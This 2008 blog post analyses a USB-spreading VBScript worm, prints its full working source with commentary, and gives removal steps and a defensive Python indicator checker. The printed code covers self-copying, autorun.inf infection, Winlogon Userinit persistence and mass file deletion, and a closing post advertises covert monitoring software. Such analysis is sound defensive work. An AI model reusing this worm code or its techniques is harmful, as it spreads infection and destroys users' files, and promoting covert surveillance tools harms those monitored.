Sunday, March 30, 2008

VirusRemoval.vbs: Virus on my pen drive!

... tackling an irritating virus! VirusRemoval.vbs by Sujin

Thanks to my much-travelled pen drive, I noticed on my laptop running XP SP2 that all folders started to open in new windows, and that too after hanging for a few seconds. I have been using Avast! happily on the laptop for quite a while (3 years), with confidence. I started a full scan. It found nothing (okay, it does find old versions of AceSpy files). But this virus? Nope.

While the scan was running, I inserted the drive into my other laptop, running Vista; the autorun window popped up asking whether to run wscript.exe, open the folder, or use ReadyBoost.

So it has something. Since this machine is too important to play with, I am trying this on a PC running XP.

The pen drive has two naughty files: autorun.inf and VirusRemoval.vbs.

The autorun.inf just makes sure that the VirusRemoval.vbs script is executed. Good for spreading this one.

Let's give the VirusRemoval.vbs file a look:

Section 1:
'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'http://Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Thanks Sujin, I am quite sure this isn't a normal virus. It is worse than those in design.

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root
Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir = Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.Drives
Set ReadAll = File.OpenAsTextStream(1,-2)
Do While Not ReadAll.AtEndOfStream
AllFile = AllFile & ReadAll.ReadLine
AllFile = AllFile & vbCrLf
Loop

Sujin didn't put in comments, so, so far, he has defined some variables and read the content of the script itself into the AllFile variable.

Count=Drv.DriveType 'The type of the drive this copy runs from (1 = removable); the loop below repeats until it is 1
Do

'Creates the text file VirusRemoval.vbs in SystemDir! But dude, why is this in a loop? Also, he takes care to set the attributes to system, read-only and hidden.
'Ahem, nice one, this is in a loop because VirusRemoval.vbs keeps on running all the time on your system! Terminate wscript.exe from Task Manager to stop it!
If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") Then
Set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If

'Ok, these are all explained quite well in the PC Tools registry guide, so I leave them!
'Sujin, did you get them from there?
'Delete all these keys from the registry!
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://sujin.com.np/"

Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"

'Now here is where the virus keeps itself in memory
'Userinit is the first program that runs after WinLogon completes its work; it loads the shell (explorer.exe), and you can replace it with your own shell.
Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

'The section below launches explorer.exe! Remember, now your shell is wscript.exe VirusRemoval.vbs, so explorer.exe needs to be launched to actually load your desktop.

For Each Drives In InDrive
root = Drives.Path & "\"
If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
Shells.Run "explorer.exe " & root
End If
Set folder=Fso.GetFolder(root)
Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
For Each files In folder.Files
auto=Left(files.Name,7)
If UCase(auto)=UCase("autorun") Then
Set Delete = Fso.DeleteFile(root & files.Name,true)
End If
Next
If Drives.DriveType=2 Then
delext "inf",Drives.Path & "\"
delext "INF",Drives.Path & "\"
End if

If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
If Drives.Path<> "A:" Then
delext "vbs",WinDir & "\"
delext "vbs",Drives.Path & "\"

If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
Fso.DeleteFile(Drives.Path & "\ravmon.exe")
End If
If Fso.FileExists(Drives.Path & "\sxs.exe") Then
Fso.DeleteFile(Drives.Path & "\sxs.exe")
End If
If Fso.FileExists(Drives.Path & "\winfile.exe") Then
Fso.DeleteFile(Drives.Path & "\winfile.exe")
End If
If Fso.FileExists(Drives.Path & "\run.wsh") Then
Fso.DeleteFile(Drives.Path & "\run.wsh")
End If

If Drives.DriveType = 1 Then
If Drives.Path<>"A:" Then
If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
WriteAll.Write AllFile
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
WriteAll.Attributes = -1
End If
'Takes care of creating the autorun.inf file
If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then
Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
Chg.Attributes = -8
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
else
Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
WriteAll.writeline "[autorun]"
WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
WriteAll.WriteLine "shell\open=Open"
WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
WriteAll.Close
Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
WriteAll.Attributes = -1
End if
End If
End If
End if
End If
Next

if Count <> 1 then
Wscript.sleep 10000
end if
loop while Count<>1
'Sub to delete every file with the given extension from a folder (except VirusRemoval.vbs itself)
sub delext(File2Find, SrchPath)
Dim oFileSys, oFolder, oFile,Cut,Delete
Set oFileSys = CreateObject("Scripting.FileSystemObject")
Set oFolder = oFileSys.GetFolder(SrchPath)
For Each oFile In oFolder.Files
Cut=Right(oFile.Name,3)
If UCase(Cut)=UCase(file2find) Then
If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
End If
Next
End sub

REMOVAL INSTRUCTIONS

  1. Terminate WSCRIPT.EXE process from Task Manager.
  2. If you still have the pen drive in, open a command prompt (Run, then cmd) and go to your pen drive's letter (say X:):
    1. X:
    2. Attrib -S -H -R VirusRemoval.vbs
    3. DEL VirusRemoval.vbs
    4. Attrib -S -H -R Autorun.inf
    5. DEL AutoRun.inf
    6. Move back to your root folder
    7. CD Windows\System32
    8. Attrib -S -H -R VirusRemoval.vbs
    9. DEL VirusRemoval.vbs
    10. AND BEFORE YOU RESTART, CHANGE THE USERINIT value to explorer.exe

That's it.

You should also manually restore the registry settings that the code above changes.
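As an added example (not from the original post, nor from the script's author), here is a small Python checker that turns the indicators above into code: it parses an autorun.inf and flags launch entries that hand control to wscript.exe or a script file, splits a Winlogon Userinit value and reports anything beyond the stock entry, and lists a drive root for those two files even though they are hidden from Explorer. The sample autorun.inf and Userinit strings are constructed from the analysis above; the stock Userinit value is assumed to be C:\WINDOWS\system32\userinit.exe, (the XP default), and reading the registry is left to the caller since the function works on the string.

```python
import os
import re

# Constructed sample: the autorun.inf the script above writes to every fixed drive.
SAMPLE_AUTORUN = (
    "[autorun]\n"
    "open=wscript.exe VirusRemoval.vbs\n"
    "shell\\open=Open\n"
    "shell\\open\\Command=wscript.exe VirusRemoval.vbs\n"
)
# Constructed sample: the Winlogon Userinit value after the RegWrite above.
SAMPLE_USERINIT = (r"C:\WINDOWS\system32\userinit.exe,"
                   r"C:\WINDOWS\system32\wscript.exe C:\WINDOWS\system32\VirusRemoval.vbs")
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|wsh|wsf|js)\b", re.I)

def autorun_findings(text):
    """Return the [autorun] launch entries whose command runs a script host or script file."""
    findings, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
        elif section == "autorun" and "=" in line:
            key, value = (p.strip() for p in line.split("=", 1))
            k, v = key.lower(), value.lower().lstrip('"')
            # Keys that launch something: open, shellexecute, shell\<verb>\command
            launches = k in ("open", "shellexecute") or (k.startswith("shell\\") and k.endswith("\\command"))
            if launches and (v.startswith(("wscript", "cscript")) or SCRIPT_EXT.search(v)):
                findings.append(key + "=" + value)
    return findings

def userinit_findings(value, system32=r"C:\WINDOWS\system32"):
    """Return every comma-separated Userinit entry other than the stock userinit.exe (assumed XP default)."""
    stock = (system32 + r"\userinit.exe").lower()
    entries = [e.strip() for e in value.split(",")]
    return [e for e in entries if e and e.lower() != stock]

def scan_drive_root(root):
    """Report an autorun.inf that launches scripts and any .vbs in the drive root (hidden or not)."""
    report = []
    for name in os.listdir(root):
        if name.lower() == "autorun.inf":
            with open(os.path.join(root, name), encoding="ascii", errors="replace") as fh:
                report += ["autorun.inf: " + f for f in autorun_findings(fh.read())]
        elif name.lower().endswith(".vbs"):
            report.append("script in root: " + name)
    return report
```

On XP the live value can be read with reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Userinit and passed to userinit_findings; an empty result means only the stock entry is present.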

Tuesday, March 25, 2008

WatchLive Pro Released

WLP is an improved version of SniperSpy; the software features simplicity in surveillance, power with real-time control, and low-cost monitoring with subscriptions as low as $19.97 per month.

www.watchlivepro.com